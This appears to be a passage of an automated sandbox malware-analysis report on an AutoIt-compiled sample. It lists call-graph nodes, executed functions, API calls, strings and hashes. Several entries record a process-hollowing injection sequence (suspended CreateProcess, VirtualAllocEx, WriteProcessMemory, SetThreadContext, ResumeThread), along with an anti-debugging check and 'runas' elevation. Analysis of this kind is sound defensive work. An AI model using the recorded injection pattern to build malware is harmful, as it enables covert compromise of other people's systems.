1e03b6 99981->99983 100001 1e02ae __fread_nolock 99981->100001 99987 1e04c5 99982->99987 99988 1e0425 99982->99988 99985 1e03bb 99983->99985 99986 1e03e6 99983->99986 99989 1e0368 99984->99989 99992 1e276a 10 API calls 99984->99992 99985->100001 100015 17c9fb 39 API calls 99985->100015 99986->100001 100016 17c9fb 39 API calls 99986->100016 99987->100001 100020 17c5df 39 API calls 99987->100020 99990 1e042a 99988->99990 99991 1e04a2 99988->99991 99995 1e1759 8 API calls 99989->99995 99996 1e0469 99990->99996 99997 1e0430 99990->99997 99991->100001 100019 17c5df 39 API calls 99991->100019 100003 1e033c 99992->100003 99995->100001 99996->100001 100018 17c5df 39 API calls 99996->100018 99997->100001 100017 17c5df 39 API calls 99997->100017 100001->99648 100004 1e276a 10 API calls 100003->100004 100005 1e0353 __fread_nolock 100004->100005 100006 1e276a 10 API calls 100005->100006 100006->99989 100008 1e020c 100007->100008 100012 1e01d0 100007->100012 100009 17c92d 39 API calls 100008->100009 100010 1e020a 100009->100010 100010->99978 100010->99979 100010->100001 100011 178e70 52 API calls 100011->100012 100012->100010 100012->100011 100013 194db8 _strftime 40 API calls 100012->100013 100013->100012 100014->100001 100015->100001 100016->100001 100017->100001 100018->100001 100019->100001 100020->100001 100022 1779ed 8 API calls 100021->100022 100023 1ddab6 GetFileAttributesW 100022->100023 100024 1ddaca GetLastError 100023->100024 100027 1ddae3 100023->100027 100025 1ddad7 CreateDirectoryW 100024->100025 100026 1ddae5 100024->100026 100025->100026 100025->100027 100026->100027 100028 1796d9 8 API calls 100026->100028 100027->99663 100029 1ddb27 100028->100029 100030 1dda81 8 API calls 100029->100030 100031 1ddb30 100030->100031 100031->100027 100032 1ddb34 CreateDirectoryW 100031->100032 100032->100027 100037 19d6be 100033->100037 100036->99690 100038 19d89f 100037->100038 100039 19d6d5 100037->100039 100065 19f669 20 API calls __dosmaperr 100038->100065 100039->100038 100043 19d740 100039->100043 100041 19d8af 100066 1a2b7c 26 API calls pre_c_initialization 100041->100066 100044 19d764 100043->100044 100046 19d78b 100043->100046 100060 1a5153 26 API calls 2 library calls 100043->100060 100059 19f669 20 API calls __dosmaperr 100044->100059 100046->100044 100053 19d7fd 100046->100053 100061 1a5153 26 API calls 2 library calls 100046->100061 100048 19d868 100048->100044 100051 19d774 100048->100051 100052 19d87b 100048->100052 100049 19d841 100049->100044 100049->100051 100056 19d857 100049->100056 100050 19d820 100050->100044 100050->100049 100062 1a5153 26 API calls 2 library calls 100050->100062 100051->99675 100064 1a5153 26 API calls 2 library calls 100052->100064 100053->100048 100053->100050 100063 1a5153 26 API calls 2 library calls 100056->100063 100059->100051 100060->100046 100061->100053 100062->100049 100063->100051 100064->100051 100065->100041 100066->100051 100077 1de723 100067->100077 100069 1ddce9 Process32NextW 100070 1ddd9b FindCloseChangeNotification 100069->100070 100076 1ddce2 100069->100076 100070->99695 100071 17bf07 8 API calls 100071->100076 100072 17b25f 8 API calls 100072->100076 100073 17694e 8 API calls 100073->100076 100074 177af4 8 API calls 100074->100076 100076->100069 100076->100070 100076->100071 100076->100072 100076->100073 100076->100074 100083 18e2e5 41 API calls 100076->100083 100082 1de72e 100077->100082 100078 1de745 100085 19668b 39 API calls _strftime 100078->100085 100081 1de74b 100081->100076 100082->100078 100082->100081 100084 196742 GetStringTypeW _strftime 100082->100084 100083->100076 100084->100082 100085->100081 100086->99380 100087->99373 100088->99372 100089->99372

                                                                                                    Executed Functions

                                                                                                    Function 00175D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 352 175d78-175de7 call 17bf07 GetVersionExW call 1784b7 357 1b4f0c-1b4f1f 352->357 358 175ded 352->358 359 1b4f20-1b4f24 357->359 360 175def-175df1 358->360 361 1b4f27-1b4f33 359->361 362 1b4f26 359->362 363 1b4f4b 360->363 364 175df7-175e56 call 1796d9 call 1779ed 360->364 361->359 366 1b4f35-1b4f37 361->366 362->361 369 1b4f52-1b4f5e 363->369 376 1b50ad-1b50b4 364->376 377 175e5c-175e5e 364->377 366->360 368 1b4f3d-1b4f44 366->368 368->357 372 1b4f46 368->372 370 175ecc-175ee6 GetCurrentProcess IsWow64Process 369->370 374 175f45-175f4b 370->374 375 175ee8 370->375 372->363 378 175eee-175efa 374->378 375->378 381 1b50b6 376->381 382 1b50d4-1b50d7 376->382 379 175e64-175e67 377->379 380 1b4fae-1b4fc1 377->380 383 175f00-175f0f LoadLibraryA 378->383 384 1b50f2-1b50f6 GetSystemInfo 378->384 379->370 385 175e69-175eab 379->385 386 1b4fea-1b4fec 380->386 387 1b4fc3-1b4fcc 380->387 388 1b50bc 381->388 389 1b50d9-1b50e8 382->389 390 1b50c2-1b50ca 382->390 391 175f11-175f1f GetProcAddress 383->391 392 175f4d-175f57 GetSystemInfo 383->392 385->370 394 175ead-175eb0 385->394 397 1b4fee-1b5003 386->397 398 1b5021-1b5024 386->398 395 1b4fd9-1b4fe5 387->395 396 1b4fce-1b4fd4 387->396 388->390 389->388 399 1b50ea-1b50f0 389->399 390->382 391->392 400 175f21-175f25 GetNativeSystemInfo 391->400 393 175f27-175f29 392->393 401 175f32-175f44 393->401 402 175f2b-175f2c FreeLibrary 393->402 403 175eb6-175ec0 394->403 404 1b4f63-1b4f6d 394->404 395->370 396->370 405 1b5010-1b501c 397->405 406 1b5005-1b500b 397->406 407 1b505f-1b5062 398->407 408 1b5026-1b5041 398->408 399->390 400->393 402->401 403->369 412 175ec6 403->412 409 1b4f6f-1b4f7b 404->409 410 1b4f80-1b4f8a 404->410 405->370 406->370 407->370 411 1b5068-1b508f 407->411 413 1b504e-1b505a 408->413 414 1b5043-1b5049 408->414 409->370 415 1b4f9d-1b4fa9 410->415 416 1b4f8c-1b4f98 410->416 417 1b509c-1b50a8 411->417 418 1b5091-1b5097 411->418 412->370 413->370 414->370 415->370 416->370 417->370 418->370
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00175DA7
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    • GetCurrentProcess.KERNEL32(?,0020DC2C,00000000,?,?), ref: 00175ED3
                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00175EDA
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00175F05
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00175F17
                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00175F25
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00175F2C
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00175F51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                    • Opcode ID: a71bd7de9ee500645ecc7a044821f513bc002cb51639dcc3e5d68587b225815f
                                                                                                    • Instruction ID: ac7c0ce2543bc5b7068f8ffe0e209ff8399f76fd82c1713c860a15bb84f73baa
                                                                                                    • Opcode Fuzzy Hash: a71bd7de9ee500645ecc7a044821f513bc002cb51639dcc3e5d68587b225815f
                                                                                                    • Instruction Fuzzy Hash: 92A1733A91A7C0CFC715DFAB7C481A97F75AB27300B84A8D9F48597262C778498CCB25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00173312 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001732EF,?), ref: 00173342
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001732EF,?), ref: 00173355
                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00242418,00242400,?,?,?,?,?,?,001732EF,?), ref: 001733C1
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                      • Part of subcall function 001741E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001733E9,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00174227
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00000001,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00173442
                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 001B3C8A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 001B3CCB
                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002331F4,00242418,?,?,?,?,?,?,?,001732EF), ref: 001B3D54
                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 001B3D5B
                                                                                                      • Part of subcall function 0017345A: GetSysColorBrush.USER32(0000000F), ref: 00173465
                                                                                                      • Part of subcall function 0017345A: LoadCursorW.USER32(00000000,00007F00), ref: 00173474
                                                                                                      • Part of subcall function 0017345A: LoadIconW.USER32(00000063), ref: 0017348A
                                                                                                      • Part of subcall function 0017345A: LoadIconW.USER32(000000A4), ref: 0017349C
                                                                                                      • Part of subcall function 0017345A: LoadIconW.USER32(000000A2), ref: 001734AE
                                                                                                      • Part of subcall function 0017345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001734C6
                                                                                                      • Part of subcall function 0017345A: RegisterClassExW.USER32(?), ref: 00173517
                                                                                                      • Part of subcall function 0017353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00173568
                                                                                                      • Part of subcall function 0017353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00173589
                                                                                                      • Part of subcall function 0017353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 0017359D
                                                                                                      • Part of subcall function 0017353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 001735A6
                                                                                                      • Part of subcall function 001738F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001739C3
                                                                                                    Strings
                                                                                                    • runas, xrefs: 001B3D4F
                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 001B3C84
                                                                                                    • AutoIt, xrefs: 001B3C7F
                                                                                                    • 0$$, xrefs: 0017341C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                    • String ID: 0$$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                    • API String ID: 683915450-3958038770
                                                                                                    • Opcode ID: 813d14e33b7b1f2ed4e96ea7a4369c99e264e500a1a61c761519d442ccd64684
                                                                                                    • Instruction ID: 424922c2176591745f0ceaa9b60b48b8eb0dac3d2eb8ebdebf2c5bc1524a425b
                                                                                                    • Opcode Fuzzy Hash: 813d14e33b7b1f2ed4e96ea7a4369c99e264e500a1a61c761519d442ccd64684
                                                                                                    • Instruction Fuzzy Hash: 7E51FA31108341EAC719EFA1EC499AE7FB8DFA5704F80846DF499521A2CB708A5DDB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010DD91A Relevance: 13.5, APIs: 8, Instructions: 1513threadinjectionprocessCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 010DE6E7
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 010DE749
                                                                                                    • WriteProcessMemory.KERNELBASE ref: 010DE797
                                                                                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 010DE87D
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE8D5
                                                                                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE921
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 010DE96C
                                                                                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 010DE98C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010D9000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2613161777-0
                                                                                                    • Opcode ID: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction ID: 2f6465a0692248f980432adef56549bc1c6242fea6a7e644c9ce389dbf9de1f8
                                                                                                    • Opcode Fuzzy Hash: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction Fuzzy Hash: AD0227A068A3C16FE343A7B0CC61B957F319F57604F1A54DEE2C49F1E3C9AA5805CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010DD91A Relevance: 13.5, APIs: 8, Instructions: 1513threadinjectionprocessCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 010DE6E7
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 010DE749
                                                                                                    • WriteProcessMemory.KERNELBASE ref: 010DE797
                                                                                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 010DE87D
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE8D5
                                                                                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE921
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 010DE96C
                                                                                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 010DE98C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DB000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2613161777-0
                                                                                                    • Opcode ID: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction ID: 2f6465a0692248f980432adef56549bc1c6242fea6a7e644c9ce389dbf9de1f8
                                                                                                    • Opcode Fuzzy Hash: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction Fuzzy Hash: AD0227A068A3C16FE343A7B0CC61B957F319F57604F1A54DEE2C49F1E3C9AA5805CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010DD91A Relevance: 13.5, APIs: 8, Instructions: 1513threadinjectionprocessCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 010DE6E7
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 010DE749
                                                                                                    • WriteProcessMemory.KERNELBASE ref: 010DE797
                                                                                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 010DE87D
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE8D5
                                                                                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE921
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 010DE96C
                                                                                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 010DE98C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2613161777-0
                                                                                                    • Opcode ID: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction ID: 2f6465a0692248f980432adef56549bc1c6242fea6a7e644c9ce389dbf9de1f8
                                                                                                    • Opcode Fuzzy Hash: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction Fuzzy Hash: AD0227A068A3C16FE343A7B0CC61B957F319F57604F1A54DEE2C49F1E3C9AA5805CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DDC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 001DDCC1
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 001DDCCF
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 001DDCEF
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 001DDD9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3243318325-0
                                                                                                    • Opcode ID: 4fa46ecbdfc6d64130a2118d3f4528ff7a5da879808339b65037c6537906d2d9
                                                                                                    • Instruction ID: 6a7c78551dee6248d37bb4ac9f5f35065c534776035888d1d5fc4159f1849d5f
                                                                                                    • Opcode Fuzzy Hash: 4fa46ecbdfc6d64130a2118d3f4528ff7a5da879808339b65037c6537906d2d9
                                                                                                    • Instruction Fuzzy Hash: C731A2711083009FD701EFA4DC85BAFBBF8AF98354F04482DF589872A2EB719944CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,001B4686), ref: 001DE397
                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 001DE3A6
                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 001DE3B7
                                                                                                    • FindClose.KERNEL32(00000000), ref: 001DE3C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2695905019-0
                                                                                                    • Opcode ID: fb02ae9c62219a780c3072de13eb6f3d4719a3fc7f9f65cffd505178e27d1b84
                                                                                                    • Instruction ID: d6da26dff2fb4bdbb2ff8a1dbcc22d14fece510e9f693f479405d6d96d1cdf51
                                                                                                    • Opcode Fuzzy Hash: fb02ae9c62219a780c3072de13eb6f3d4719a3fc7f9f65cffd505178e27d1b84
                                                                                                    • Instruction Fuzzy Hash: 86F0A030412A106BC211777CAC0D8BA7BECAE41336B504712F835C22F6DBB099A54695
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00195078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0019504E,?,002398D8,0000000C,001951A5,?,00000002,00000000), ref: 00195099
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0019504E,?,002398D8,0000000C,001951A5,?,00000002,00000000), ref: 001950A0
                                                                                                    • ExitProcess.KERNEL32 ref: 001950B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: d90e1c284165c8cdf0838e25d83234297c7d4c209b91540beb61ec7d51893aff
                                                                                                    • Instruction ID: e39748eac7d7164b6a5b6594c4b44aae4256fe661299f5f9a411276ec925840b
                                                                                                    • Opcode Fuzzy Hash: d90e1c284165c8cdf0838e25d83234297c7d4c209b91540beb61ec7d51893aff
                                                                                                    • Instruction Fuzzy Hash: 09E0B631401648AFCF226FA4ED0DE597B6AEB51381F044054F8599A132DB75DD42CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00173E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 173e15-173e45 call 19019b call 19016b 5 173e47-173e49 0->5 6 173e6e-173e80 call 19919b 0->6 8 173e4a-173e50 5->8 6->8 12 173e82-173e94 call 19919b 6->12 10 173e65-173e6b 8->10 11 173e52-173e62 call 19015d call 1901a4 8->11 11->10 19 173e9a-173eac call 19919b 12->19 20 1b4585-1b4587 12->20 23 173eb2-173ec4 call 19919b 19->23 24 1b458c-1b458f 19->24 20->8 27 173eca-173edc call 19919b 23->27 28 1b4594-1b45cb call 174154 call 174093 call 173fb8 call 194cf3 23->28 24->8 33 1b462e-1b4633 27->33 34 173ee2-173ef4 call 19919b 27->34 60 1b4608-1b460b 28->60 61 1b45cd-1b45d8 28->61 33->8 38 1b4639-1b4655 call 18e2e5 33->38 42 1b4677-1b4688 call 1da316 34->42 43 173efa-173f0c call 19919b 34->43 46 1b4662-1b466a 38->46 47 1b4657-1b465b 38->47 56 1b468a-1b46d2 call 17b25f * 2 call 175379 call 173aa3 call 17bd2c * 2 42->56 57 1b46dc-1b46e2 42->57 58 173f26 43->58 59 173f0e-173f20 call 19919b 43->59 46->8 52 1b4670 46->52 47->38 51 1b465d 47->51 51->8 52->42 78 1b4704-1b4706 56->78 105 1b46d4-1b46d7 56->105 62 1b46f5-1b46ff call 1da12a 57->62 67 173f29-173f2e call 17ad74 58->67 59->8 59->58 63 1b460d-1b461b 60->63 64 1b45f6-1b4603 call 1901a4 60->64 61->60 68 1b45da-1b45e1 61->68 62->78 77 1b4620-1b4629 call 1901a4 63->77 64->62 80 173f33-173f35 67->80 68->64 74 1b45e3-1b45e7 68->74 74->64 75 1b45e9-1b45f4 74->75 75->77 77->8 78->8 83 173f3b-173f5e call 173fb8 call 174093 call 19919b 80->83 84 1b46e4-1b46e9 80->84 101 173fb0-173fb3 83->101 102 173f60-173f72 call 19919b 83->102 84->8 87 1b46ef-1b46f0 84->87 87->62 101->67 102->101 107 173f74-173f86 call 19919b 102->107 105->8 110 173f9c-173fa5 107->110 111 173f88-173f9a call 19919b 107->111 110->8 112 173fab 110->112 111->67 111->110 112->67
                                                                                                    Strings
                                                                                                    Memory Dump Source
